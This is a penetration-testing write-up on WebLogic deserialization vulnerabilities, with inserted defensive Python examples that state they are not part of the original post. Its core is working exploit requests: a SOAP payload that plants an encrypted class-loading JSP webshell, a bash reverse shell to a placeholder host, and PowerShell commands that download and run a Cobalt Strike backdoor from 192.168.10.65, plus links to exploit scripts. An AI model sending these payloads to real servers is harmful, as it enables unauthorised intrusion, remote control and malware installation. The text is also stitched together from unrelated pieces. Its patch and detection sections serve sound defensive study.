WebLogic 12.1.3 configuration
Start the server from the directory below; at this point the username and password no longer need to be entered:
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain
The installation succeeded and the console can be accessed normally.
III. WebLogic penetration testing summary
1. XMLDecoder deserialization vulnerability CVE-2017-10271
Vulnerability overview
The WLS Security component of WebLogic exposes a web service that uses XMLDecoder to parse user-supplied XML data. A deserialization flaw during that parsing allows arbitrary commands to be executed.
Affected versions
10.3.6.0, 12.1.3.0.0, 12.2.1.1.0
Verifying the vulnerability
When a POST to /wls-wsat/CoordinatorPortType returns the response shown below, the vulnerability is present. Every servlet in the wls-wsat package is affected; check web.xml to list all affected URLs.
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wls-wsat\54p17w\war\WEB-INF
Go to that directory and view web.xml.
In summary, the following URLs are affected:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
Reproducing the vulnerability
Intercept the request and modify its content:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/zcc.jsp</string>
          <void method="println">
            <string>
              <![CDATA[ <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> ]]>
            </string>
          </void>
          <void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
PoC for a Linux reverse shell:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i >& /dev/tcp/x.x.x.x/4444 0>&1</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
Getting a Windows host to call back to CS
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.10.154:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 704

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>powershell</string>
            </void>
            <void index="1">
              <string>-Command</string>
            </void>
            <void index="2">
              <string>(new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc.exe','zcc.exe');start-process zcc.exe</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
Generate the backdoor with CS
Place it on Kali and start a simple HTTP server
PowerShell command for calling back to CS:
powershell -Command (new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc.exe','zcc.exe');start-process zcc.exe
Successfully checked in to CS
Protection
Download the October security patch from the Oracle website:
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
2. XMLDecoder deserialization vulnerability CVE-2017-3506
Vulnerability overview
CVE-2017-10271 and CVE-2017-3506 share the same root cause; CVE-2017-10271 simply bypasses the CVE-2017-3506 patch. The CVE-2017-3506 patch added a validation function that checks whether any node in the payload is an object tag:
private void validate(InputStream is) {
    WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
    try {
        SAXParser parser = factory.newSAXParser();
        parser.parse(is, new DefaultHandler() {
            public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXException {
                // reject any element named "object", regardless of case
                if (qName.equalsIgnoreCase("object")) {
                    throw new IllegalStateException("Invalid context type: object");
                }
            }
        });
    } catch (ParserConfigurationException var5) {
        throw new IllegalStateException("Parser Exception", var5);
    } catch (SAXException var6) {
        throw new IllegalStateException("Parser Exception", var6);
    } catch (IOException var7) {
        throw new IllegalStateException("Parser Exception", var7);
    }
}
Affected versions
10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1, 12.2.1.2
Reproducing the vulnerability
PoC used:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/zcc3.jsp</string>
          <void method="println">
            <string>
              <![CDATA[ <% out.print("zcc1 hello"); %> ]]>
            </string>
          </void>
          <void method="close"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
Protection
Download the October security patch from the Oracle website:
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
3. wls-wsat deserialization remote code execution vulnerability CVE-2019-2725
Vulnerability overview
This vulnerability is essentially another entry point for CVE-2017-10271. The CVE-2017-3506 patch filtered object; the CVE-2017-10271 patch filtered the new and method tags, allowed void to be followed only by index, and allowed array to be followed only by a byte-type class; the CVE-2019-2725 patch filtered class and limited the byte length in the array tag.
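To make the three successive filter stages concrete, here is an added example (not Oracle's code, and not part of the original write-up) that re-implements the validate() check shown under CVE-2017-3506 and the additional rules this section attributes to the CVE-2017-10271 and CVE-2019-2725 patches as a single SAX filter with a selectable patch level. It is run against constructed skeletons of the two payload shapes the write-up shows (the object-based PrintWriter form and the void/ProcessBuilder form, with placeholder strings instead of commands) plus a benign header, so a defender can see exactly which stage rejects which shape. The array-length cap is an assumed value; the write-up gives no number.

```python
import xml.sax
from xml.sax.handler import ContentHandler

# Cumulative patch levels as the write-up describes them (hypothetical
# re-implementation for illustration, not the vendor's code):
#   CVE-2017-3506  patch: reject the <object> element
#   CVE-2017-10271 patch: also reject <new> and <method>; <void> may carry
#                         only an index attribute; <array> only class="byte"
#   CVE-2019-2725  patch: also reject <class>; cap the length of <array>
LEVEL_3506 = 1
LEVEL_10271 = 2
LEVEL_2725 = 3


class Rejected(Exception):
    """Raised from inside the SAX callback to abort parsing with a reason."""


class WorkContextFilter(ContentHandler):
    def __init__(self, level, max_array_length):
        super().__init__()
        self.level = level
        self.max_array_length = max_array_length

    def startElement(self, name, attrs):
        tag = name.lower()
        # Stage 1: the original CVE-2017-3506 check (same message as the Java code)
        if tag == "object":
            raise Rejected("Invalid context type: object")
        # Stage 2: the CVE-2017-10271 additions
        if self.level >= LEVEL_10271:
            if tag in ("new", "method"):
                raise Rejected("Invalid context type: " + tag)
            if tag == "void" and any(a != "index" for a in attrs.getNames()):
                raise Rejected("Invalid attribute for void")
            if tag == "array" and attrs.get("class") != "byte":
                raise Rejected("Invalid array class")
        # Stage 3: the CVE-2019-2725 additions
        if self.level >= LEVEL_2725:
            if tag == "class":
                raise Rejected("Invalid context type: class")
            if tag == "array" and int(attrs.get("length", "0")) > self.max_array_length:
                raise Rejected("Array too long")


def validate(soap_xml, level, max_array_length=1000):
    """Return None when the document passes the filter at `level`, otherwise
    the rejection reason. max_array_length (1000) is an assumed cap."""
    try:
        xml.sax.parseString(soap_xml, WorkContextFilter(level, max_array_length))
    except Rejected as e:
        return str(e)
    return None


# Constructed payload skeletons mirroring the shapes in the write-up; the
# file name and command strings are placeholders.
ENVELOPE = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soapenv:Header>'
            '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
            '{body}</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>')

# CVE-2017-3506 shape: <object> directly inside <java>
PAYLOAD_OBJECT = ENVELOPE.format(body=(
    '<java><object class="java.io.PrintWriter"><string>placeholder.jsp</string>'
    '<void method="close"/></object></java>'))

# CVE-2017-10271 shape: no <object>, but <void class=...> and a String array
PAYLOAD_VOID_CLASS = ENVELOPE.format(body=(
    '<java version="1.4.0" class="java.beans.XMLDecoder">'
    '<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">'
    '<void index="0"><string>placeholder</string></void></array>'
    '<void method="start"/></void></java>'))

# Benign WorkContext content (constructed)
PAYLOAD_BENIGN = ENVELOPE.format(body='<note>ok</note>')


if __name__ == "__main__":
    for name, doc in (("object", PAYLOAD_OBJECT), ("void-class", PAYLOAD_VOID_CLASS), ("benign", PAYLOAD_BENIGN)):
        for level in (LEVEL_3506, LEVEL_10271, LEVEL_2725):
            print(name, "level", level, "->", validate(doc, level) or "accepted")
```

The object-based payload is stopped at the first stage, while the void/ProcessBuilder shape passes the CVE-2017-3506 check untouched and is only rejected once the CVE-2017-10271 rules are active, which is the bypass relationship the text describes; the benign header passes at every level.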
Affected components
bea_wls9_async_response.war, wsat.war
Affected versions
10.3.*, 12.1.3
Verifying the vulnerability
Request /_async/AsyncResponseService; a 200 response means the endpoint exists, a 404 means it does not.
The affected URLs, taken from web.xml, are listed below. The file is located at:
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\WEB-INF
/_async/AsyncResponseService
/_async/AsyncResponseServiceJms
/_async/AsyncResponseServiceHttps
/_async/AsyncResponseServiceSoap12
/_async/AsyncResponseServiceSoap12Jms
/_async/AsyncResponseServiceSoap12Https
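The two endpoint lists in this write-up (the wls-wsat URLs under CVE-2017-10271 and the _async URLs above) are also what a defender would watch for in the server's access log. The following added example (not part of the original post) reads Common Log Format lines such as WebLogic's access.log, flags any request to those endpoints, distinguishing the fingerprinting GET from a SOAP POST, and flags a JSP being fetched from under /bea_wls_internal/, which is where the PrintWriter payload shown earlier writes its file. The log lines are constructed with documentation-range addresses; the finding labels are my own.

```python
import re

# Endpoints named in the write-up: wls-wsat for CVE-2017-10271/3506 and
# _async for CVE-2019-2725; all of them parse the WorkContext SOAP header.
WLS_WSAT_ENDPOINTS = {
    "/wls-wsat/CoordinatorPortType", "/wls-wsat/RegistrationPortTypeRPC",
    "/wls-wsat/ParticipantPortType", "/wls-wsat/RegistrationRequesterPortType",
    "/wls-wsat/CoordinatorPortType11", "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/ParticipantPortType11", "/wls-wsat/RegistrationRequesterPortType11",
}
ASYNC_ENDPOINTS = {
    "/_async/AsyncResponseService", "/_async/AsyncResponseServiceJms",
    "/_async/AsyncResponseServiceHttps", "/_async/AsyncResponseServiceSoap12",
    "/_async/AsyncResponseServiceSoap12Jms", "/_async/AsyncResponseServiceSoap12Https",
}
WATCHED = WLS_WSAT_ENDPOINTS | ASYNC_ENDPOINTS

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')


def classify(method, path):
    """Map one request to a finding label, or None if it is uninteresting."""
    if path in WATCHED:
        # A POST carries the SOAP body; a GET is the probe the write-up uses
        # to check whether the endpoint exists.
        return "soap-endpoint-post" if method == "POST" else "soap-endpoint-probe"
    # The PrintWriter payload drops its JSP under the bea_wls_internal web app;
    # a JSP being fetched from there is a follow-up indicator.
    if path.startswith("/bea_wls_internal/") and path.endswith(".jsp"):
        return "jsp-under-bea_wls_internal"
    return None


def triage(log_text):
    """Return one finding dict per suspicious line, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        path = m.group("path").split("?", 1)[0]  # drop the query string
        label = classify(m.group("method"), path)
        if label:
            findings.append({"ip": m.group("ip"), "path": path,
                             "status": int(m.group("status")), "label": label})
    return findings


# Constructed sample lines (not real traffic)
SAMPLE_LOG = """\
192.0.2.10 - - [09/Aug/2021:14:09:42 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1520
198.51.100.7 - - [09/Aug/2021:16:27:37 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1223
198.51.100.7 - - [09/Aug/2021:16:27:40 +0800] "GET /bea_wls_internal/zcc.jsp HTTP/1.1" 200 11
203.0.113.5 - - [10/Aug/2021:14:27:38 +0800] "GET /_async/AsyncResponseService HTTP/1.1" 200 350
203.0.113.5 - - [10/Aug/2021:14:27:41 +0800] "POST /_async/AsyncResponseService?wsdl HTTP/1.1" 202 0
"""


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["label"], f["ip"], f["path"], f["status"])
```

A POST to one of these endpoints followed shortly by a GET for a new JSP under /bea_wls_internal/ from the same address is the sequence the reproduction steps in this write-up would leave behind, so correlating the two labels per source address is the natural next step.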
Reproducing the vulnerability
Requesting that URL returns the following, which indicates the vulnerability is present
The PoC for calling back to CS on Windows is below; the exe is the one generated above:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
          <void index="0">
            <string>powershell</string>
          </void>
          <void index="1">
            <string>-Command</string>
          </void>
          <void index="2">
            <string>(new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc1.exe','zcc1.exe');start-process zcc1.exe</string>
          </void>
        </array>
        <void method="start"/>
      </void>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
    <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>
Protection
1. Upgrade the local JDK
2. Install the official patches promptly
4. WebLogic T3 protocol deserialization command execution vulnerability CVE-2018-2628
Vulnerability overview
A remote attacker can send malicious data without authentication over the T3 protocol (EJB supports remote access over several protocols; this is the main difference between a Web Container and an EJB Container) to make WebLogic Server deserialize it. By exploiting a flaw in the RMI (Remote Method Invocation) mechanism, an arbitrary deserialization payload is executed over JRMP (Java Remote Messaging Protocol).
Affected versions
10.3.6.0, 12.1.3.0, 12.2.1.1, 12.2.1.2
Related vulnerabilities
CVE-2015-4852, CVE-2016-0638, CVE-2016-3510, CVE-2017-3248, CVE-2018-2893, CVE-2016-0638
Verifying the vulnerability
Run the script (it requires a Python 2 environment); when the output shown below appears, the vulnerability is present.
Script: https://github.com/shengqi158/CVE-2018-2628
Reproducing the vulnerability
Windows getshell, using k8weblogicGUI.exe
Something went wrong here, so the file name was changed to 1.jsp
Connect with the script to obtain an interactive shell (it requires a Python 2 environment)
Script: https://github.com/jas502n/CVE-2018-2628
Call back to CS from here, using the same payload as above renamed to zcc3.exe:
powershell -Command (new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc3.exe','zcc3.exe');start-process zcc3.exe
Protection
Filter the T3 protocol: in the domain structure open Security -> Filters, and in the connection filter field enter:
weblogic.security.net.ConnectionFilterImpl
Save and restart WebLogic.
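The write-up names only the filter class; the rules that accompany it (entered in the connection filter rules field) decide which sources may speak T3. The following added example, not part of the original post, shows a constructed rule set in the ConnectionFilterImpl line format (target localAddress localPort action protocols) and a small Python evaluator that applies it first-match-wins to sample connections, so an administrator can check the intended policy before saving it. The management subnet 10.0.5.0/24 is an assumption, and the evaluator is my own approximation of the rule semantics, not WebLogic's code.

```python
import ipaddress

# Rules in the weblogic.security.net.ConnectionFilterImpl line format:
#   target localAddress localPort action protocols
# The policy is a constructed example: T3/T3S only from an assumed
# management subnet, denied from everywhere else, HTTP(S) left open.
RULES_TEXT = """
# management hosts may use T3 (assumed subnet)
10.0.5.0/24  *  *  allow  t3 t3s
# everyone else: no T3
0.0.0.0/0    *  *  deny   t3 t3s
# web traffic stays available
0.0.0.0/0    *  *  allow  http https
"""


def parse_rules(text):
    """Parse rule lines, ignoring blank lines and # comments."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        target, local_addr, local_port, action, *protocols = line.split()
        rules.append({"target": target, "local_addr": local_addr,
                      "local_port": local_port, "action": action,
                      "protocols": set(protocols)})
    return rules


def evaluate(rules, remote_ip, local_port, protocol):
    """Return 'allow' or 'deny' from the first rule matching the connection,
    or None when no rule matches (this example's rule set always ends in a
    catch-all for the protocols it covers, so None only means 'unhandled
    protocol' here). First-match-wins is my reading of how the rule file is
    evaluated, in order from the top."""
    ip = ipaddress.ip_address(remote_ip)
    for r in rules:
        if r["target"] != "*" and ip not in ipaddress.ip_network(r["target"], strict=False):
            continue
        if r["local_port"] != "*" and int(r["local_port"]) != local_port:
            continue
        if protocol not in r["protocols"]:
            continue
        return r["action"]
    return None


RULES = parse_rules(RULES_TEXT)


if __name__ == "__main__":
    for ip, proto in (("10.0.5.20", "t3"), ("203.0.113.9", "t3"), ("203.0.113.9", "http")):
        print(ip, proto, "->", evaluate(RULES, ip, 7001, proto))
```

Because T3 is what the CVE-2018-2628 tooling in this section speaks to port 7001, denying it from every address except the hosts that genuinely need it removes that entry point while leaving the HTTP endpoints (which need their own patches, as the earlier sections describe) available.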